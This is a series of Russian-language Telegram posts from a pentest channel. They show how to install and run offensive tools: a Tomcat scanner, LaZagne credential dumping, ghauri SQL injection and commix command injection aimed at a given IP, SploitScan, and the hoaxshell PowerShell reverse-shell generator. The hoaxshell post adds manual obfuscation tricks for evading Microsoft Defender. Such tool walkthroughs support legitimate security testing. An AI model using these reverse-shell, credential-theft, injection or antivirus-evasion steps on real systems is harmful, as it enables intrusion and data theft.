Please open Telegram to view this post
VIEW IN TELEGRAM
Узкоспециализированный инструмент написанный на
Установка:
sudo python3 -m pip install apachetomcatscanner
Запуск:ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves
▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite
#tomcat #apache #apachetomcatscanner #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для восстановления забытых 😄 паролей, написан на Python
Примеры использования:
laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password
#lazagne #python #password #recovery #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
Поддерживаемые СУБД:
MySQL
Microsoft SQL Server
Postgres
Oracle
Поддерживаемые типы:
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
git clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
#ghauri #sqli #sqlinjection #python #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🧩 hoaxshell
Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)
Установка:
Примеры:
-i -
-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация
Полезные ключи
Ручная обфускация:
Надо заменить
Примеры:
С реГисТром можно и нужно играться
😹 Home
#hoaxshell #powershell #python #soft #manual
✈️ Whitehat Lab
Генератор и обработчик полезной нагрузки для Windows через PowerShell. Написан на Python
Бонус: при небольшой обработке "напильником" обходим последний Defender со всеми апдейтами (см. картинку)
Установка:
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
Примеры:
python3 hoaxshell.py -s 192.168.1.36 -iro -H "Authorization"
-i -
Invoke-RestMethod вместо Invoke-WebRequest-r - Без кодирования в Base64
Нет смысла кодировать т.к. дорабатывать будем руками, все дефолтные методы "палятся" АВ
-o - Обфускация
Полезные ключи
-ng и -lt для создания ngrok или localtunnel сессииРучная обфускация:
Надо заменить
Invoke-RestMethod и Invoke-WebRequest на аналоги и/или напихать кавычек. Мы же любим кавычки ? 😃Примеры:
i''nV''okE-R''eStMe''Th''oD
ir''M
i''eX
Ir''M
С реГисТром можно и нужно играться
#hoaxshell #powershell #python #soft #manual
Please open Telegram to view this post
VIEW IN TELEGRAM
UPD. Большой апдейт до major ветки 4.0
Комбайн для эксплуатации Command Injection уязвимостей, написан на python
В
git clone https://github.com/commixproject/commix.git commix
python commix.py -h
"Детский" режим:
python commix --wizard
Обычный запуск:
python commix -u http://62.173.140.174:16016/ --data 'action='
Поддержка тамперов:
python commix -u http://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs
Список тамперов:
python commix --list-tampers#commix #python #pentest #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
JSON Web Token - специальный формат токена, который позволяет безопасно(в идеале 😁) передавать данные между клиентом и сервером.
Состоит из трёх частей: заголовок, пейлоад и подпись
Пример простейшей реализации на Python
import json
import hmac
import hashlib
import base64
import uuid
header = {"typ": "JWT", "alg": "HS256"}
payload = {"name": "exited3n", "isAdmin": True}
secret = str(uuid.uuid4())
def jwt_gen(header: dict, payload: dict, secret: str) -> bytes:
jwt_parts = []
json_header = json.dumps(header).encode()
json_payload = json.dumps(payload).encode()
jwt_parts.append(base64.urlsafe_b64encode(json_header))
jwt_parts.append(base64.urlsafe_b64encode(json_payload))
merge_payload_header = b'.'.join(jwt_parts)
signature = hmac.new(secret.encode(), merge_payload_header, hashlib.sha256).digest()
jwt_parts.append(base64.urlsafe_b64encode(signature))
return b'.'.join(jwt_parts)
print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))
#jwt #token #flask #python
Please open Telegram to view this post
VIEW IN TELEGRAM
Нашел отличный и удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой
Установка в
sudo apt install sploitscan
В репозиториях не самая новая версия, поэтому рекомендую ставить с гитхаба.
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
PyPi:
pip install --user sploitscan
Источники PoC'ов:
➡️ GitHub➡️ ExploitDB➡️ VulnCheck (нужен free API key)➡️ Packet Storm➡️ Nuclei
Импорт из:
Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)
В конфиге указываем API ключи поддерживаемых сервисов (config.json)
{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}Поиск по CVE:
sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413
Поиск по ключевым словам:
sploitscan -k "Outlook Express"
Импорт и экспорт:
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -e {json,csv,html}
Помощь AI:
sploitscan --ai openai CVE-2024-21413
┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...
#sploitscan #poc #cve #python
Please open Telegram to view this post
VIEW IN TELEGRAM